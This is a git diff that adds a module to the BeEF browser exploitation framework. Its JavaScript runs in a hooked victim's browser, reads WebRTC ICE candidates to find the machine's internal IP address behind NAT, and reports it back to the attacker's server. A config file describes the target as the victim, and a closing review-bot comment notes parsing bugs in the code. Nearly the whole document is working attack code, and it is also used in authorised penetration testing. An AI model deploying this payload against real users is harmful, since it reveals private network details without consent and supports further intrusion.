diff --git a/modules/host/get_internal_ip_webrtc/command.js b/modules/host/get_internal_ip_webrtc/command.js
new file mode 100755
index 000000000..e5f663ba9
--- /dev/null
+++ b/modules/host/get_internal_ip_webrtc/command.js
@@ -0,0 +1,60 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var RTCPeerConnection = window.webkitRTCPeerConnection || window.mozRTCPeerConnection;
+
+ if (RTCPeerConnection) (function () {
+
+ var addrs = Object.create(null);
+ addrs["0.0.0.0"] = false;
+
+ // Establish a connection with ICE / relay servers - in this instance: NONE
+ var rtc = new RTCPeerConnection({iceServers:[]});
+ if (window.mozRTCPeerConnection) { // FF needs a channel/stream to proceed
+ rtc.createDataChannel('', {reliable:false});
+ };
+
+ // Upon an ICE candidate being found
+ // Grep the SDP data for IP address data
+ rtc.onicecandidate = function (evt) {
+ if (evt.candidate) grepSDP(evt.candidate.candidate);
+ };
+
+ // Create an SDP offer
+ rtc.createOffer(function (offerDesc) {
+ grepSDP(offerDesc.sdp);
+ rtc.setLocalDescription(offerDesc);
+ }, function (e) { beef.net.send('<%= @command_url %>', <%= @command_id %>, "SDP Offer Failed"); });
+
+ function processIPs(newAddr) {
+ if (newAddr in addrs) return;
+ else addrs[newAddr] = true;
+ var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(" or perhaps "));
+ }
+
+ function grepSDP(sdp) {
+ var hosts = [];
+ sdp.split('\r\n').forEach(function (line) { // c.f. http://tools.ietf.org/html/rfc4566#page-39
+ if (~line.indexOf("a=candidate")) { // http://tools.ietf.org/html/rfc4566#section-5.13
+ var parts = line.split(' '), // http://tools.ietf.org/html/rfc5245#section-15.1
+ addr = parts[4],
+ type = parts[7];
+ if (type === 'host') processIPs(addr);
+ } else if (~line.indexOf("c=")) { // http://tools.ietf.org/html/rfc4566#section-5.7
+ var parts = line.split(' '),
+ addr = parts[2];
+ processIPs(addr);
+ }
+ });
+ }
+ })(); else {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, "Browser doesn't appear to support RTCPeerConnection");
+ }
+
+});
diff --git a/modules/host/get_internal_ip_webrtc/config.yaml b/modules/host/get_internal_ip_webrtc/config.yaml
new file mode 100755
index 000000000..53b964e01
--- /dev/null
+++ b/modules/host/get_internal_ip_webrtc/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ get_internal_ip_webrtc:
+ enable: true
+ category: "Host"
+ name: "Get Internal IP WebRTC"
+ description: "Retrieve the internal (behind NAT) IP address of the victim machine using WebRTC Peer-to-Peer connection framework. Code from http://net.ipcalf.com/"
+ authors: ["xntrik", "@natevw"]
+ target:
+ working: ["C", "FF"]
+ unknown: ["All"]
diff --git a/modules/host/get_internal_ip_webrtc/module.rb b/modules/host/get_internal_ip_webrtc/module.rb
new file mode 100755
index 000000000..3f501683a
--- /dev/null
+++ b/modules/host/get_internal_ip_webrtc/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_internal_ip_webrtc < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['Result'] = @datastore['result']
+ save content
+ end
+
+end
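Review bot: In `grepSDP` (command.js) the second branch tests `~line.indexOf("c=")`, which matches any SDP line that merely contains that substring, and neither branch checks that `parts[2]` / `parts[4]` exists before calling `processIPs`, so `undefined` or a non-address token can be stored in `addrs` and reported as "IP is undefined". Anchoring the test with `line.indexOf("c=") === 0` and guarding the call with `if (addr) processIPs(addr);` would keep the stored result clean. `var hosts = [];` is never read and can be dropped. A comment above `processIPs` should also state that the value is whatever the browser places in its host candidates; browsers that mask host candidates with mDNS names would yield a `.local` hostname rather than an address, so the "IP is" wording can overstate what was observed.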